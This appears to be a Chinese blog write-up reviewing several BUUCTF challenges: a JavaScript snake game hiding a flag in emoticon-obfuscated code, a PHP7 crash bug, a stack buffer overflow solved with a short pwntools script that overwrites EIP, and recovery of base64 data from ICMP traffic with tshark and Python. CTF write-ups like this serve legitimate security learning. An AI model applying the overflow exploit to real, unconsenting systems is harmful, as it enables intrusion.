BUUctf-2nd复盘

2020-01-17

这学期一直在咕咕咕，期末考完还要搞启明星啥的- - 感觉大学也不轻松..趁在学校最后两天填下坑（好像机房关机了，没复现完）只做了几个基础题。

by:小帽

web

贪吃蛇

玩一下没有触发请求，看一下js

1579260680557

在里面发现一段js颜文字加密拿到2500分以上才会触发

1579260749945

把颜文字解密得到flag

1579260724802

Flag{6b4807273afdffc4426b790debcd2b96}

眼熟我吗

我猜是一叶飘零师傅给西湖论剑出的题，只是当时考察点那里写错了所以不用绕过。

应该是利用php7崩溃的漏洞http://dy.163.com/v2/article/detail/ED2K0KCA0511CJ6O.html

没复现成功= =

PWN

magic

1579095137527

运行后查找EIP寄存器中字符串

1579095650733

得到偏移 1579095671829

也可以在IDA中查看偏移为0x12+0x04=22

即22位无用字节需要填充，只需要把最后要执行的地址写在后面就会进EIP中并被执行

from pwn import *
p=process('./magicc')
#p=remote('10.11.80.202','22')
p.recvuntil('Choose!')
p.sendline('4')
p.recvuntil('success')
payload1='A'*22
cat=0x80485AD
payload=payload1+p32(cat)
p.sendline(payload)
p.interactive()

Misc

蜘蛛侠

打开翻一下，都是ICMP流量，只有一组http请求。

发现ICMP流量前面都是有个START字样，那就先把所有流量都存下来看看

1579250443808

tshark -r out.pcap -T fields -e data >out.txt

打开看看，每4行都是重复的，再把16进制转成ascii

1579250649796

lines=open('out.txt','rb').readlines()
file=open('old_file.txt','wb')
i=0
for line in lines:
        if i%4==0:
                file.write(line.strip().decode('hex'))
        i+=1
file.close()

1579251196153

删掉前面那部分，后面应该可以解base

import base64
lines=open('old_file.txt','rb').readlines()
file=open('new_file','wb')
result=''
for line in lines[1:-1]:
    result+=line[9:].strip()
file.write(base64.b64decode(result))